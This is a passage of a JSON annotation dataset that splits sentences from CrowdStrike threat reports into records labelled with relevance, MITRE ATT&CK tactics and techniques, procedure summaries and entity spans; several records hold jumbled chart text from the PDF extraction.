"Agentic AI-powered triage and investigations can extend these capabilities, autonomously analyzing signals across domains to surface high-fidelity insights and prioritize real threats.", "sentence_text": "Proactive threat hunting and threat intelligence further enhance detection by identifying potential attack patterns and providing insights into adversary TTPs.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-44_crowdstrike_report-p17-s104-60761b", "source": "crowdstrike", "doc_id": "44_crowdstrike_report", "page_number": 17, "sentence_id": 104, "context_before": "Proactive threat hunting and threat intelligence further enhance detection by identifying potential attack patterns and providing insights into adversary TTPs.", "sentence_text": "Defend the cloud as core infrastructure Cloud-focused adversaries are exploiting misconfigurations, stolen credentials, and cloud management tools to infiltrate systems, move laterally, and maintain persistent access for malicious activities like data theft and ransomware deployment.", "relevant": "yes", "tactic": [ { "id": "TA0001", "name": "Initial Access" }, { "id": "TA0008", "name": "Lateral Movement" }, { "id": "TA0003", "name": "Persistence" }, { "id": "TA0009", "name": "Collection" }, { "id": "TA0040", "name": "Impact" } ], "techniques": [ { "id": "T1078", "name": "Valid Accounts" }, { "id": "T1021", "name": "Remote Services" }, { "id": "T1098", "name": "Account Manipulation" }, { "id": "T1567", "name": "Exfiltration Over Web Service" }, { "id": "T1486", "name": "Data Encrypted for Impact" } ], "procedure": "Exploit misconfigurations, stolen credentials, and cloud management tools to infiltrate systems, move laterally, maintain persistence, steal data, and deploy ransomware.", "entities": [ { "text": "Cloud-focused adversaries", "start": 40, "end": 65, "label": "ThreatActor" }, { "text": "exploiting misconfigurations, stolen credentials, and cloud management tools to infiltrate systems, move laterally, and maintain persistent access for malicious activities like data theft and ransomware deployment", "start": 70, "end": 283, "label": "Action" } ] }, { "uid": "crowdstrike-44_crowdstrike_report-p17-s105-c1305f", "source": "crowdstrike", "doc_id": "44_crowdstrike_report", "page_number": 17, "sentence_id": 105, "context_before": "Defend the cloud as core infrastructure Cloud-focused adversaries are exploiting misconfigurations, stolen credentials, and cloud management tools to infiltrate systems, move laterally, and maintain persistent access for malicious activities like data theft and ransomware deployment.", "sentence_text": "Cloud-native application protection platforms (CNAPPs) with cloud detection and response (CDR)\ncapabilities are critical to counter these threats.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-44_crowdstrike_report-p17-s106-7122e3", "source": "crowdstrike", "doc_id": "44_crowdstrike_report", "page_number": 17, "sentence_id": 106, "context_before": "Cloud-native application protection platforms (CNAPPs) with cloud detection and response (CDR)\ncapabilities are critical to counter these threats.", "sentence_text": "Regular audits are also critical to maintaining security.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-44_crowdstrike_report-p17-s107-dc7da3", "source": "crowdstrike", "doc_id": "44_crowdstrike_report", "page_number": 17, "sentence_id": 107, "context_before": "Regular audits are also critical to maintaining security.", "sentence_text": "Frequent reviews of cloud environments promptly addresses unused permissions and outdated configurations.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-44_crowdstrike_report-p17-s108-b8847e", "source": "crowdstrike", "doc_id": "44_crowdstrike_report", "page_number": 17, "sentence_id": 108, "context_before": "Frequent reviews of cloud environments promptly addresses unused permissions and outdated configurations.", "sentence_text": "Prioritize vulnerabilities with an adversary-centric approach Adversaries are increasingly exploiting publicly disclosed vulnerabilities and using exploit chaining, combining multiple vulnerabilities to gain rapid access, escalate privileges, and bypass defenses.", "relevant": "yes", "tactic": [ { "id": "TA0001", "name": "Initial Access" }, { "id": "TA0004", "name": "Privilege Escalation" }, { "id": "TA0005", "name": "Defense Evasion" } ], "techniques": [ { "id": "T1190", "name": "Exploit Public-Facing Application" }, { "id": "T1068", "name": "Exploitation for Privilege Escalation" } ], "procedure": "Exploit publicly disclosed vulnerabilities and chain multiple exploits to gain access, escalate privileges, and bypass defenses.", "entities": [ { "text": "Adversaries", "start": 62, "end": 73, "label": "ThreatActor" }, { "text": "exploiting publicly disclosed vulnerabilities and using exploit chaining, combining multiple vulnerabilities to gain rapid access, escalate privileges, and bypass defenses", "start": 91, "end": 262, "label": "Action" } ] }, { "uid": "crowdstrike-44_crowdstrike_report-p17-s109-99ba3d", "source": "crowdstrike", "doc_id": "44_crowdstrike_report", "page_number": 17, "sentence_id": 109, "context_before": "Prioritize vulnerabilities with an adversary-centric approach Adversaries are increasingly exploiting publicly disclosed vulnerabilities and using exploit chaining, combining multiple vulnerabilities to gain rapid access, escalate privileges, and bypass defenses.", "sentence_text": "These multi-stage attacks often rely on public resources like proof-of-concept (POC) exploits and technical blogs, enabling adversaries to craft effective and hard-to-detect payloads.", "relevant": "yes", "tactic": [ { "id": "TA0042", "name": "Resource Development" } ], "techniques": [ { "id": "T1587.004", "name": "Develop Capabilities: Exploits" } ], "procedure": "Use public proof-of-concept exploits and technical blogs to craft effective payloads.", "entities": [ { "text": "rely on public resources like proof-of-concept (POC) exploits and technical blogs, enabling adversaries to craft effective and hard-to-detect payloads", "start": 32, "end": 182, "label": "Action" } ] }, { "uid": "crowdstrike-44_crowdstrike_report-p17-s110-e02606", "source": "crowdstrike", "doc_id": "44_crowdstrike_report", "page_number": 17, "sentence_id": 110, "context_before": "These multi-stage attacks often rely on public resources like proof-of-concept (POC) exploits and technical blogs, enabling adversaries to craft effective and hard-to-detect payloads.", "sentence_text": "Monitoring for subtle signs of exploit chaining, such as unexpected crashes or privilege escalation attempts, can help detect attacks before they progress.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-44_crowdstrike_report-p17-s111-a8077e", "source": "crowdstrike", "doc_id": "44_crowdstrike_report", "page_number": 17, "sentence_id": 111, "context_before": "Monitoring for subtle signs of exploit chaining, such as unexpected crashes or privilege escalation attempts, can help detect attacks before they progress.", "sentence_text": "Know the adversary and be prepared When a cyberattack unfolds in minutes — or even seconds — being prepared can be the difference between containment and catastrophe.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-44_crowdstrike_report-p17-s112-d94bcd", "source": "crowdstrike", "doc_id": "44_crowdstrike_report", "page_number": 17, "sentence_id": 112, "context_before": "Know the adversary and be prepared When a cyberattack unfolds in minutes — or even seconds — being prepared can be the difference between containment and catastrophe.", "sentence_text": "Though technology is critical to detect and stop intrusions, the end user remains a crucial link in the chain to stop breaches.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-44_crowdstrike_report-p17-s113-0704bf", "source": "crowdstrike", "doc_id": "44_crowdstrike_report", "page_number": 17, "sentence_id": 113, "context_before": "Though technology is critical to detect and stop intrusions, the end user remains a crucial link in the chain to stop breaches.", "sentence_text": "Organizations should initiate user awareness programs to combat the continued threat of phishing and related social engineering techniques.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-44_crowdstrike_report-p17-s114-07891a", "source": "crowdstrike", "doc_id": "44_crowdstrike_report", "page_number": 17, "sentence_id": 114, "context_before": "Organizations should initiate user awareness programs to combat the continued threat of phishing and related social engineering techniques.", "sentence_text": "For security teams, practice makes perfect.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-44_crowdstrike_report-p17-s115-0f100b", "source": "crowdstrike", "doc_id": "44_crowdstrike_report", "page_number": 17, "sentence_id": 115, "context_before": "For security teams, practice makes perfect.", "sentence_text": "Encourage an environment that routinely performs tabletop exercises and red/blue teaming to identify gaps and eliminate weaknesses in your cybersecurity practices and response.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-44_crowdstrike_report-p18-s116-e422d6", "source": "crowdstrike", "doc_id": "44_crowdstrike_report", "page_number": 18, "sentence_id": 116, "context_before": "Encourage an environment that routinely performs tabletop exercises and red/blue teaming to identify gaps and eliminate weaknesses in your cybersecurity practices and response.", "sentence_text": "AboutAbout\nhas redefined modern security with the world’s most advanced cloud-native platform for protecting critical areas of enterprise risk — endpoints and cloud workloads, identity and data.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-44_crowdstrike_report-p18-s117-161a96", "source": "crowdstrike", "doc_id": "44_crowdstrike_report", "page_number": 18, "sentence_id": 117, "context_before": "AboutAbout\nhas redefined modern security with the world’s most advanced cloud-native platform for protecting critical areas of enterprise risk — endpoints and cloud workloads, identity and data.", "sentence_text": "Learn more: www.crowdstrike.com Follow us: Blog | X | LinkedIn", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-44_crowdstrike_report-p18-s118-06d25e", "source": "crowdstrike", "doc_id": "44_crowdstrike_report", "page_number": 18, "sentence_id": 118, "context_before": "Learn more: www.crowdstrike.com Follow us: Blog | X | LinkedIn", "sentence_text": "| YouTube Start a free trial today: www.crowdstrike.com/free-trial-guide", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-45_crowdstrike_report-p2-s4-dac639", "source": "crowdstrike", "doc_id": "45_crowdstrike_report", "page_number": 2, "sentence_id": 4, "context_before": "I N G R E P O R T", "sentence_text": "EXECUTIVE SUMMARY\nAdversaries\nWeaponize and\nTarget AI at Scale", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-45_crowdstrike_report-p2-s5-0a7fba", "source": "crowdstrike", "doc_id": "45_crowdstrike_report", "page_number": 2, "sentence_id": 5, "context_before": "EXECUTIVE SUMMARY\nAdversaries\nWeaponize and\nTarget AI at Scale", "sentence_text": "Today’s “enterprising adversary” executes attacks with calculated, business-like efficiency, operating with precision to maximize their impact and quickly achieve their goals.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-45_crowdstrike_report-p2-s6-1ec0df", "source": "crowdstrike", "doc_id": "45_crowdstrike_report", "page_number": 2, "sentence_id": 6, "context_before": "Today’s “enterprising adversary” executes attacks with calculated, business-like efficiency, operating with precision to maximize their impact and quickly achieve their goals.", "sentence_text": "These adversaries are adept at bypassing traditional cybersecurity defenses.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-45_crowdstrike_report-p2-s7-c6ce52", "source": "crowdstrike", "doc_id": "45_crowdstrike_report", "page_number": 2, "sentence_id": 7, "context_before": "These adversaries are adept at bypassing traditional cybersecurity defenses.", "sentence_text": "They seek to stay undetected by moving to unmanaged networks and expanding their reach.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-45_crowdstrike_report-p2-s8-b42c21", "source": "crowdstrike", "doc_id": "45_crowdstrike_report", "page_number": 2, "sentence_id": 8, "context_before": "They seek to stay undetected by moving to unmanaged networks and expanding their reach.", "sentence_text": "These cross-domain threats often generate fewer detections in a single domain or product, making the activity difficult to recognize as malicious.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-45_crowdstrike_report-p2-s9-6a72ba", "source": "crowdstrike", "doc_id": "45_crowdstrike_report", "page_number": 2, "sentence_id": 9, "context_before": "These cross-domain threats often generate fewer detections in a single domain or product, making the activity difficult to recognize as malicious.", "sentence_text": "As adversaries continue to evolve their operations, we must understand them in order to stop them.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-45_crowdstrike_report-p2-s10-a5ae2d", "source": "crowdstrike", "doc_id": "45_crowdstrike_report", "page_number": 2, "sentence_id": 10, "context_before": "As adversaries continue to evolve their operations, we must understand them in order to stop them.", "sentence_text": "Counter Adversary Operations comprises two closely integrated teams: CrowdStrike Intelligence analysts and CrowdStrike OverWatch threat hunters.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-45_crowdstrike_report-p2-s11-bb9f14", "source": "crowdstrike", "doc_id": "45_crowdstrike_report", "page_number": 2, "sentence_id": 11, "context_before": "Counter Adversary Operations comprises two closely integrated teams: CrowdStrike Intelligence analysts and CrowdStrike OverWatch threat hunters.", "sentence_text": "Together, they protect thousands of customers from the most sophisticated adversaries by providing the intelligence and threat hunting skills and resources that most organizations lack.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-45_crowdstrike_report-p2-s12-d0f016", "source": "crowdstrike", "doc_id": "45_crowdstrike_report", "page_number": 2, "sentence_id": 12, "context_before": "Together, they protect thousands of customers from the most sophisticated adversaries by providing the intelligence and threat hunting skills and resources that most organizations lack.", "sentence_text": "The CrowdStrike 2025 Threat Hunting Report highlights the trends this team has observed from July 2024 to June 2025 and details how the team uses innovation and proactive, intelligence-informed threat hunting.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-45_crowdstrike_report-p2-s13-2225d2", "source": "crowdstrike", "doc_id": "45_crowdstrike_report", "page_number": 2, "sentence_id": 13, "context_before": "The CrowdStrike 2025 Threat Hunting Report highlights the trends this team has observed from July 2024 to June 2025 and details how the team uses innovation and proactive, intelligence-informed threat hunting.", "sentence_text": "Following is a summary of the report’s key findings and observations.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-45_crowdstrike_report-p3-s14-cc3ff0", "source": "crowdstrike", "doc_id": "45_crowdstrike_report", "page_number": 3, "sentence_id": 14, "context_before": "Following is a summary of the report’s key findings and observations.", "sentence_text": "EXECUTIVE SUMMARY\nKey Findings\nMalware-free intrusions are on the rise:\n81% of interactive intrusions were malware-free.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-45_crowdstrike_report-p3-s15-9534af", "source": "crowdstrike", "doc_id": "45_crowdstrike_report", "page_number": 3, "sentence_id": 15, "context_before": "EXECUTIVE SUMMARY\nKey Findings\nMalware-free intrusions are on the rise:\n81% of interactive intrusions were malware-free.", "sentence_text": "Interactive (hands-on-keyboard)\nintrusions increased 27% year-over-year, highlighting that adversaries are innovating their operations to bypass legacy detection methods.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-45_crowdstrike_report-p3-s16-9342c9", "source": "crowdstrike", "doc_id": "45_crowdstrike_report", "page_number": 3, "sentence_id": 16, "context_before": "Interactive (hands-on-keyboard)\nintrusions increased 27% year-over-year, highlighting that adversaries are innovating their operations to bypass legacy detection methods.", "sentence_text": "eCrime is dominating the attack landscape:\n73% of the total interactive intrusions from July 2024 to June 2025 were associated with eCrime activity, highlighting the persistent and pervasive threat of adversaries seeking financial gain.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-45_crowdstrike_report-p3-s17-a581bc", "source": "crowdstrike", "doc_id": "45_crowdstrike_report", "page_number": 3, "sentence_id": 17, "context_before": "eCrime is dominating the attack landscape:\n73% of the total interactive intrusions from July 2024 to June 2025 were associated with eCrime activity, highlighting the persistent and pervasive threat of adversaries seeking financial gain.", "sentence_text": "China is targeting the cloud:\nsuspected cloud-conscious China-nexus actors.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-45_crowdstrike_report-p3-s18-5e9939", "source": "crowdstrike", "doc_id": "45_crowdstrike_report", "page_number": 3, "sentence_id": 18, "context_before": "China is targeting the cloud:\nsuspected cloud-conscious China-nexus actors.", "sentence_text": "Voice phishing (vishing) attacks are surging:", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-45_crowdstrike_report-p3-s19-a1ddc6", "source": "crowdstrike", "doc_id": "45_crowdstrike_report", "page_number": 3, "sentence_id": 19, "context_before": "Voice phishing (vishing) attacks are surging:", "sentence_text": "In the first half of 2025, vishing attacks already surpassed the total number seen in 2024.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-45_crowdstrike_report-p3-s20-73e4e8", "source": "crowdstrike", "doc_id": "45_crowdstrike_report", "page_number": 3, "sentence_id": 20, "context_before": "In the first half of 2025, vishing attacks already surpassed the total number seen in 2024.", "sentence_text": "Targeted intrusions against the government sector are on the rise:\nThe government sector was affected by a 71% year-over-year increase in overall interactive intrusions and a 185% year-over-year increase in targeted intrusion activity.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-45_crowdstrike_report-p4-s21-cf160c", "source": "crowdstrike", "doc_id": "45_crowdstrike_report", "page_number": 4, "sentence_id": 21, "context_before": "Targeted intrusions against the government sector are on the rise:\nThe government sector was affected by a 71% year-over-year increase in overall interactive intrusions and a 185% year-over-year increase in targeted intrusion activity.", "sentence_text": "EXECUTIVE SUMMARY\nADVERSARY NATION-STATE OR CATEGORY BEAR RUSSIA BUFFALO VIETNAM CHOLLIMA DPRK (NORTH KOREA) CONVENTIONS CRANE ROK (REPUBLIC OF KOREA)", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-45_crowdstrike_report-p4-s22-97be9d", "source": "crowdstrike", "doc_id": "45_crowdstrike_report", "page_number": 4, "sentence_id": 22, "context_before": "EXECUTIVE SUMMARY\nADVERSARY NATION-STATE OR CATEGORY BEAR RUSSIA BUFFALO VIETNAM CHOLLIMA DPRK (NORTH KOREA) CONVENTIONS CRANE ROK (REPUBLIC OF KOREA)", "sentence_text": "HAWK SYRIA NAMING JACKAL HACKTIVIST KITTEN IRAN LEOPARD PAKISTAN LYNX GEORGIA OCELOT COLOMBIA PANDA PEOPLE’S REPUBLIC OF CHINA SAIGA KAZAKHSTAN SPHINX EGYPT SPIDER eCRIME TIGER INDIA WOLF TÜRKIYE", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-45_crowdstrike_report-p5-s23-8993a6", "source": "crowdstrike", "doc_id": "45_crowdstrike_report", "page_number": 5, "sentence_id": 23, "context_before": "HAWK SYRIA NAMING JACKAL HACKTIVIST KITTEN IRAN LEOPARD PAKISTAN LYNX GEORGIA OCELOT COLOMBIA PANDA PEOPLE’S REPUBLIC OF CHINA SAIGA KAZAKHSTAN SPHINX EGYPT SPIDER eCRIME TIGER INDIA WOLF TÜRKIYE", "sentence_text": "The overall distribution of interactive intrusion activity by threat type saw a noted increase in eCrime:\n73% of the total 2025 reporting period volume was associated with eCrime activity, highlighting the persistent and pervasive threat of adversaries seeking financial gain.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-45_crowdstrike_report-p5-s24-be5d63", "source": "crowdstrike", "doc_id": "45_crowdstrike_report", "page_number": 5, "sentence_id": 24, "context_before": "The overall distribution of interactive intrusion activity by threat type saw a noted increase in eCrime:\n73% of the total 2025 reporting period volume was associated with eCrime activity, highlighting the persistent and pervasive threat of adversaries seeking financial gain.", "sentence_text": "INTERACTIVE INTRUSIONS BY FREQUENCY Q3 Q4 Q1 Q2 Q3 Q4 Q1 Q2 Q3 Q4 Q1 Q2 2022 2023 2024 2025 TOP SECTORS BY INTRUSION FREQUENCY INTERACTIVE INTRUSIONS BY MOTIVATION TECHNOLOGY CONSULTING & PROFESSIONAL SERVICES", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-45_crowdstrike_report-p5-s25-8ec671", "source": "crowdstrike", "doc_id": "45_crowdstrike_report", "page_number": 5, "sentence_id": 25, "context_before": "INTERACTIVE INTRUSIONS BY FREQUENCY Q3 Q4 Q1 Q2 Q3 Q4 Q1 Q2 Q3 Q4 Q1 Q2 2022 2023 2024 2025 TOP SECTORS BY INTRUSION FREQUENCY INTERACTIVE INTRUSIONS BY MOTIVATION TECHNOLOGY CONSULTING & PROFESSIONAL SERVICES", "sentence_text": ".1% MANUFACTURING RETAIL 26.5% FINANCIAL SERVICES eCrime HEALTHCARE Nation-State 2025 GOVERNMENT Hacktivism TELECOMMUNICATIONS 73.4% INDUSTRIALS & ENGINEERING ACADEMIC", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-45_crowdstrike_report-p6-s26-8d4951", "source": "crowdstrike", "doc_id": "45_crowdstrike_report", "page_number": 6, "sentence_id": 26, "context_before": ".1% MANUFACTURING RETAIL 26.5% FINANCIAL SERVICES eCrime HEALTHCARE Nation-State 2025 GOVERNMENT Hacktivism TELECOMMUNICATIONS 73.4% INDUSTRIALS & ENGINEERING ACADEMIC", "sentence_text": "EXECUTIVE SUMMARY\nSECTOR TARGETING\nThe technology sector remained at the top of the list for the reporting period, making technology the most frequently targeted industry for the eighth consecutive year.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-45_crowdstrike_report-p6-s27-1fc892", "source": "crowdstrike", "doc_id": "45_crowdstrike_report", "page_number": 6, "sentence_id": 27, "context_before": "EXECUTIVE SUMMARY\nSECTOR TARGETING\nThe technology sector remained at the top of the list for the reporting period, making technology the most frequently targeted industry for the eighth consecutive year.", "sentence_text": "This sector encompasses a broad range of organizations that develop computer software and hardware or provide IT services or technology.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-45_crowdstrike_report-p6-s28-cc39df", "source": "crowdstrike", "doc_id": "45_crowdstrike_report", "page_number": 6, "sentence_id": 28, "context_before": "This sector encompasses a broad range of organizations that develop computer software and hardware or provide IT services or technology.", "sentence_text": "Due to its relationship to many other sectors, the technology sector is a high-value target for both nation-state and eCrime adversaries.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-45_crowdstrike_report-p6-s29-fc353e", "source": "crowdstrike", "doc_id": "45_crowdstrike_report", "page_number": 6, "sentence_id": 29, "context_before": "Due to its relationship to many other sectors, the technology sector is a high-value target for both nation-state and eCrime adversaries.", "sentence_text": "TOP TARGETED SECTORS BY INTRUSION FREQUENCY July 2023-June 2024 July 2024-June 2025 TECHNOLOGY 2% CONSULTING & PROFESSIONAL SERVICES 17% MANUFACTURING 51% RETAIL 41% FINANCIAL SERVICES 26% HEALTHCARE 23% GOVERNMENT 71% TELECOMMUNICATIONS 53% INDUSTRIALS & ENGINEERING 37% ACADEMIC 39% MEDIA 6% OPPORTUNISTIC 44% ENERGY 19% LOGISTICS 58% REAL ESTATE -12% NATION-STATE VS.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-45_crowdstrike_report-p6-s30-ca87ca", "source": "crowdstrike", "doc_id": "45_crowdstrike_report", "page_number": 6, "sentence_id": 30, "context_before": "TOP TARGETED SECTORS BY INTRUSION FREQUENCY July 2023-June 2024 July 2024-June 2025 TECHNOLOGY 2% CONSULTING & PROFESSIONAL SERVICES 17% MANUFACTURING 51% RETAIL 41% FINANCIAL SERVICES 26% HEALTHCARE 23% GOVERNMENT 71% TELECOMMUNICATIONS 53% INDUSTRIALS & ENGINEERING 37% ACADEMIC 39% MEDIA 6% OPPORTUNISTIC 44% ENERGY 19% LOGISTICS 58% REAL ESTATE -12% NATION-STATE VS.", "sentence_text": "eCRIME TECHNOLOGY 99% TECHNOLOGY -12% CONSULTING & TELECOMMUNICATIONS 130% PROFESSIONAL SERVICES 5% CONSULTING & PROFESSIONAL SERVICES 126% MANUFACTURING 55% GOVERNMENT 185% RETAIL 42% FINANCIAL SERVICES 80% FINANCIAL SERVICES 10% The government and telecommunications sectors saw a significant increase in interactive intrusions during the reporting period, namely by nation-state adversaries.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-45_crowdstrike_report-p6-s31-ab912b", "source": "crowdstrike", "doc_id": "45_crowdstrike_report", "page_number": 6, "sentence_id": 31, "context_before": "eCRIME TECHNOLOGY 99% TECHNOLOGY -12% CONSULTING & TELECOMMUNICATIONS 130% PROFESSIONAL SERVICES 5% CONSULTING & PROFESSIONAL SERVICES 126% MANUFACTURING 55% GOVERNMENT 185% RETAIL 42% FINANCIAL SERVICES 80% FINANCIAL SERVICES 10% The government and telecommunications sectors saw a significant increase in interactive intrusions during the reporting period, namely by nation-state adversaries.", "sentence_text": "Russia-nexus activity accounted for most of the government targeting, while China-nexus activity accounted for most of the telecommunications targeting.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-45_crowdstrike_report-p7-s32-af5fc0", "source": "crowdstrike", "doc_id": "45_crowdstrike_report", "page_number": 7, "sentence_id": 32, "context_before": "Russia-nexus activity accounted for most of the government targeting, while China-nexus activity accounted for most of the telecommunications targeting.", "sentence_text": "EXECUTIVE SUMMARY\nMOST INTRUSIVE ADVERSARIES PLUMP VICE MUTANT SCATTERED ETHEREAL GLACIAL CIRCUIT SUNRISE SPIDER SPIDER SPIDER SPIDER PANDA PANDA PANDA PANDA FINANCIAL* TECHNOLOGY SERVICES* RETAIL HEALTHCARE TELECOMS* HEALTHCARE MANUFACTURING SERVICES* FINANCIAL* RETAIL TECHNOLOGY MANUFACTURING REAL ESTATE RETAIL NGO TELECOMS* TECHNOLOGY FAMOUS CURLY SCATTERED FAMOUS PUNK TUNNEL PRIMITIVE VENOMOUS CHOLLIMA SPIDER SPIDER CHOLLIMA SPIDER SPIDER BEAR BEAR TECHNOLOGY RETAIL RETAIL TECHNOLOGY MANUFACTURING REAL ESTATE GOVERNMENT GOVERNMENT SERVICES* MANUFACTURING AVIATION SERVICES* AUTOMOTIVE FINANCIAL* SERVICES*", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-45_crowdstrike_report-p7-s33-17b251", "source": "crowdstrike", "doc_id": "45_crowdstrike_report", "page_number": 7, "sentence_id": 33, "context_before": "EXECUTIVE SUMMARY\nMOST INTRUSIVE ADVERSARIES PLUMP VICE MUTANT SCATTERED ETHEREAL GLACIAL CIRCUIT SUNRISE SPIDER SPIDER SPIDER SPIDER PANDA PANDA PANDA PANDA FINANCIAL* TECHNOLOGY SERVICES* RETAIL HEALTHCARE TELECOMS* HEALTHCARE MANUFACTURING SERVICES* FINANCIAL* RETAIL TECHNOLOGY MANUFACTURING REAL ESTATE RETAIL NGO TELECOMS* TECHNOLOGY FAMOUS CURLY SCATTERED FAMOUS PUNK TUNNEL PRIMITIVE VENOMOUS CHOLLIMA SPIDER SPIDER CHOLLIMA SPIDER SPIDER BEAR BEAR TECHNOLOGY RETAIL RETAIL TECHNOLOGY MANUFACTURING REAL ESTATE GOVERNMENT GOVERNMENT SERVICES* MANUFACTURING AVIATION SERVICES* AUTOMOTIVE FINANCIAL* SERVICES*", "sentence_text": "FINANCIAL* TECHNOLOGY NOMAD PANDA GOVERNMENTGOVERNMENT MURKY OPERATOR PANDA PANDA GOVERNMENT", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-45_crowdstrike_report-p7-s34-9388f3", "source": "crowdstrike", "doc_id": "45_crowdstrike_report", "page_number": 7, "sentence_id": 34, "context_before": "FINANCIAL* TECHNOLOGY NOMAD PANDA GOVERNMENTGOVERNMENT MURKY OPERATOR PANDA PANDA GOVERNMENT", "sentence_text": "SERVICES*SERVICES*", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-45_crowdstrike_report-p7-s35-e2b096", "source": "crowdstrike", "doc_id": "45_crowdstrike_report", "page_number": 7, "sentence_id": 35, "context_before": "SERVICES*SERVICES*", "sentence_text": "TECHNOLOGY TELECOMS*TELECOMS*", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-45_crowdstrike_report-p7-s36-499c80", "source": "crowdstrike", "doc_id": "45_crowdstrike_report", "page_number": 7, "sentence_id": 36, "context_before": "TECHNOLOGY TELECOMS*TELECOMS*", "sentence_text": "VAULT SERVICES* PANDA FINANCIAL* PLUMP SINFUL PHANTOM SPIDER SPIDER PANDA GLACIAL FINANCIAL* OPPORTUNISTIC TELECOMS*TELECOMS PANDA TELECOMS* RETAIL TECHNOLOGY KRYPTONITE FROZEN NIMBLE TECHNOLOGY SERVICES* PANDA SPIDER SPIDER GOVERNMENT HOSPITALITY HOSPITALITY MANUFACTURING MANUFACTURING STATIC SPECTRAL GLACIAL PULSAR KITTEN SPIDER PANDA KITTEN ACADEMIC TECHNOLOGY TELECOMS* GOVERNMENT MUSTANG NIMBLE SUNRISE HEALTHCARE RETAIL HEALTHCARE PANDA SPIDER PANDA GOVERNMENT RETAIL SERVICES* GOVERNMENT REAL ESTATE TECHNOLOGY ENERGY TECHNOLOGY TECHNOLOGY SERVICES* MANUFACTURING GOVERNMENT HOSPITALITY UTILITIES TELECOMS*", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-45_crowdstrike_report-p7-s37-17e078", "source": "crowdstrike", "doc_id": "45_crowdstrike_report", "page_number": 7, "sentence_id": 37, "context_before": "VAULT SERVICES* PANDA FINANCIAL* PLUMP SINFUL PHANTOM SPIDER SPIDER PANDA GLACIAL FINANCIAL* OPPORTUNISTIC TELECOMS*TELECOMS PANDA TELECOMS* RETAIL TECHNOLOGY KRYPTONITE FROZEN NIMBLE TECHNOLOGY SERVICES* PANDA SPIDER SPIDER GOVERNMENT HOSPITALITY HOSPITALITY MANUFACTURING MANUFACTURING STATIC SPECTRAL GLACIAL PULSAR KITTEN SPIDER PANDA KITTEN ACADEMIC TECHNOLOGY TELECOMS* GOVERNMENT MUSTANG NIMBLE SUNRISE HEALTHCARE RETAIL HEALTHCARE PANDA SPIDER PANDA GOVERNMENT RETAIL SERVICES* GOVERNMENT REAL ESTATE TECHNOLOGY ENERGY 